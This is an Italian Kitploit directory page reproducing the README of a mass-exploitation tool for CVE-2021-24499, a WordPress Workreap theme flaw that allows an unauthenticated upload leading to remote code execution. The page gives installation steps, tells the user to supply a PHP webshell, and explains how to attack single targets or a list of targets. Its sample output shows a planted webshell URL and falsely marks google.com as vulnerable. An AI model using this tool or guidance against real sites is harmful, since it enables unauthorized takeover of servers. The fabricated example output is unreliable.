Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-24499 — WordPress Theme Workreap 2.2.2 - Upload non autenticato che porta all'esecuzione remota di codice | Kitploit
Strumenti/GitHubGitHub/jayhutajulu1/cve-2021-24499
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubjayhutajulu1/cve-2021-24499

CVE-2021-24499

WordPress Theme Workreap 2.2.2 - Upload non autenticato che porta all'esecuzione remota di codice

Vedi Repository
6 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-24499 | Workreap - Freelance Marketplace and Directory WordPress Theme < 2.2.2 - Caricamento File Arbitrario

CVE License Shell

WordPress Theme Workreap 2.2.2 - Caricamento File Non Autenticato che Porta a Esecuzione di Codice Remota

Un potente e accurato strumento di sfruttamento di massa per la vulnerabilità CVE-2021-24499 nel tema WordPress Workreap. Questo exploit consente il caricamento di file non autenticato che può portare a Remote Code Execution (RCE).

📝 Descrizione

CVE-2021-24499 è una vulnerabilità critica nel tema WordPress Workreap (versione 2.2.2 e precedenti) che consente a utenti non autenticati di caricare file arbitrari, inclusi file PHP, tramite l'azione AJAX workreap_award_temp_file_uploader. Ciò può portare a Remote Code Execution (RCE) sul server di destinazione.

Versioni Vulnerabili: Tutte le versioni fino alla 2.2.2 inclusa

Punteggio CVSS: Critico

📦 Requisiti

  • Shell Bash (Linux/macOS/WSL)
  • Strumento da riga di comando curl
  • File opts.php o shell.php (webshell PHP)

🔧 Installazione

  1. Clona questo repository:
root@kitploit:~
git clone https://github.com/jayhutajulu1/CVE-2021-24499.git
cd CVE-2021-24499
  1. Rendi eseguibile lo script:
root@kitploit:~
chmod +x exploit.sh
  1. Assicurati di avere opts.php o shell.php nella stessa directory (la tua webshell PHP)

🚀 Utilizzo

Utilizzo di Base

Singolo Target:

root@kitploit:~
./exploit.sh -u http://target.com

Target Multipli (da file):

root@kitploit:~
./exploit.sh -l targets.txt

Mostra Aiuto:

root@kitploit:~
./exploit.sh --help

Opzioni della Riga di Comando

OpzioneDescrizione
-u URLSfrutta un singolo URL target
-l FILESfrutta più target da un file (un URL per riga)
--helpMostra il menu di aiuto

Formato del File dei Target

Crea un file di testo con un URL per riga:

root@kitploit:~
http://target1.com
https://target2.com
http://target3.com

📸 Esempi

Esempio 1: Sfruttamento di un Singolo Target

root@kitploit:~
$ ./exploit.sh -u https://domain.com

WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu

https://domain.com/ >> VULNERABLE! 
 --> SHELL: https://domain.com//wp-content/uploads/workreap-temp/shell.php

Esempio 2: Sfruttamento di Massa

root@kitploit:~
$ ./exploit.sh -l targets.txt

WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu

https://domain.com >> NOT VULNERABLE!
https://www.google.com >> VULNERABLE!
https://www.domain.com >> NOT VULNERABLE!
https://google.com >> VULNERABLE!

⚠️ Disclaimer

Questo strumento è fornito solo per scopi educativi e di test autorizzati.

  • NON utilizzare questo strumento su sistemi che non possiedi o per i quali non hai esplicita autorizzazione scritta a testare
  • NON utilizzare questo strumento per attività illegali
  • Gli autori e i collaboratori NON sono responsabili di qualsiasi uso improprio o danno causato da questo strumento
  • Assicurati sempre di avere la dovuta autorizzazione prima di testare qualsiasi sistema
  • Usalo in modo responsabile ed etico

Utilizzando questo strumento, accetti di usarlo solo per legittimi test di sicurezza e scopi di ricerca.

🔗 Riferimenti

  • Exploit-DB
  • Wordfence
  • WP-Scan

👤 Crediti

Autore: Jay Maranatha Hutajulu

📄 Licenza

Questo progetto è concesso in licenza sotto la MIT License - vedi il file LICENSE per i dettagli.

🤝 Contributi

Contributi, segnalazioni di problemi e richieste di funzionalità sono benvenuti! Sentiti libero di controllare la pagina delle issues.

⭐ Cronologia Stelle

Se trovi utile questo strumento, considera di assegnargli una stella ⭐


Ricorda: Usa sempre gli strumenti di sicurezza in modo responsabile ed etico. Buon hacking! 🚀

Scarica lo strumento